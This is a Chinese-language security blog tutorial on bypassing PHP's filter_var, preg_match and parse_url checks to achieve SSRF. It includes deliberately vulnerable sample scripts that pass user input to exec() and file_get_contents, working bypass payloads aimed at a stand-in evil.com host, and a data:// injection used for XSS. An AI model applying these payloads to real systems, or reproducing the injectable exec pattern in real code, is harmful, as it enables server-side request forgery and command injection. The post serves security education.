SSRF如何绕过filter_var和preg_match以及parse_url

0x01 前言

这篇文章是在我看完一片国外安全大佬写的文章后对其进行总结并翻译得到的。

0x02 正文之绕过filter_var和preg_match

本片文章主要深入一种php ssrf的技术——如何绕过例如filter_var(), preg_match()和parse_url()等函数。

本次我进行测试的php版本全部为php v5.6.30
php-version

PHP 漏洞代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

echo "Argument: ".$argv[1]."\n";

//check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)){

//parse URL
$r = parse_url($argv[1]);
print_r($r);

//check if host ends with google.com
if(preg_match('/baidu\.com$/', $r['host'])){

//get page from URL
exec('curl -v -s "'.$r['host'].'"', $a);
print_r($a);
}else{
echo "Error: Host not allowed";
}
}else{
echo "Error: Invalid URL";
}

?>

这段代码里使用了filter_var()函数,preg_match()函数来进行过滤,并用parse_url()函数进行解析,最后利用exec函数执行curl命令进行访问网址。

在正式介绍绕过技术之前,我们需要了解一下以上函数的具体作用。

filter_var()
filter_var — 使用特定的过滤器过滤一个变量
FILTER_VALIDATE_URL

preg_match()
该函数使用正则表达式来进行匹配特定的字符串

parse_url()
parse_url

ok,了解了这些函数后,说说上面的测试代码。这段代码的是获取第一个参数(这个参数是用来模拟通过$_GET或者$_POST方法获取的),然后通过filter_var()函数判断传入的url时候符合规定。如果如何规定,通过parse_url来解析这个参数,获取到host值,通过preg_match函数来判断host时候以baidu.com结尾。

运行上面的代码得到的正常结果如下:

如果不是正常的参数呢?

1
http://evil.com

绕过FILTER_VALIDATE_URL和正则表达式

许多URL结构保留一些特殊的字符用来表示特殊的含义,这些符号在URL中不同的位置有着其特殊的语义。字符“;”, “/”, “?”, “:”, “@”, “=” 和“&”是被保留的。除了分层路径中的点段,通用语法将路径段视为不透明。 生成URI的应用程序通常使用段中允许的保留字符来分隔。例如“;”和“=”用来分割参数和参数值。逗号也有着类似的作用。

例如,有的结构使用name;v=1.1来表示name的version是1.1,然而还可以使用name,1.1来表示相同的意思。当然对于URL来说,这些保留的符号还是要看URL的算法来表示他们的作用。

例如,如果用于hostname上,URL

1
http://evil.com;baidu.com

会被curl或者wget这样的工具解析为host:evil.com,querything:baidu.com

运行代码试一下

发现报错了,返回的是Invalid URL,那么因该是filter_var函数没有绕过。filter_var函数可以解析多种协议,我们可以试一下不是http的协议,例如

1
0://evil.com;baidu.com

ok,成功绕过filter_var和preg_match函数!但是我们发现它并没有解析我们的url,别担心,我们试试添加一下端口号,因为不是http的话默认端口就不是80了

1
0://evil.com:80;baidu.com:80

ok,成功解析!

当然,我们之前说的逗号也是可以跟分号是一个作用的

依旧成功!

0x03 正文之绕过parse_url

parse_url函数不是用来验证URL的正确性的,而是尽可能的去解析URL,并把URL分割成特定的部分。在这种情况下,可以使用将URL的部分变为变量从而进行绕过。

1
0://evil$baidu.com

这里,在bash中,$var是一个变量,在这个例子中$baidu这个变量未定义是个空,也就是说这个URL是0://evil<空>.com,也就是0://evil.com,成功绕过!

但是这种方法也是有局限性的,因为需要利用bash中的特性,因此只有在php脚本中使用exec()、system()等命令执行的函数执行curl或者wget命令时才可以完成。

0x04 正文之data://伪协议和xss利用

与上面的exec不同,这里我们使用的是filter_get_content函数,php的测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
echo "Argument: ".$argv[1]."\n";
// check if argument is a valid URL
if(filter_var($argv[1], FILTER_VALIDATE_URL)) {
// parse URL
$r = parse_url($argv[1]);
print_r($r);
// check if host ends with google.com
if(preg_match('/baidu\.com$/', $r['host'])) {
// get page from URL
$a = file_get_contents($argv[1]);
echo($a);
} else {
echo "Error: Host not allowed";
}
} else {
echo "Error: Invalid URL";
}
?>

这次我们的任务是在响应主体中修改内容,添加一个“Hacked by Pino_HD”

1
data://text/plain;base64,SGFja2VkIGJ5IFBpbm8Kbaidu.com

发现parse_url函数把text设置成了host,然后报了Host not allowed错误。但是别担心,我们可以注入一些东西到MIME类型的地方,因为php是不关心MIME类型的。。

1
data://baidu.com/plain;base64,SGFja2VkIGJ5IFBpbm8K

ok,成功在响应包中写入我们想要写的东西。因此我们是可以控制响应体的内容,从而形成xss

本文标题:SSRF如何绕过filter_var和preg_match以及parse_url

文章作者:Pino-HD

发布时间:2018年05月30日 - 22:05

最后更新:2018年05月30日 - 23:05

原始链接:https://pino-hd.github.io/2018/05/30/SSRF如何绕过filter-var和preg-match以及parse-url/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创技术分享,您的支持将鼓励我继续创作!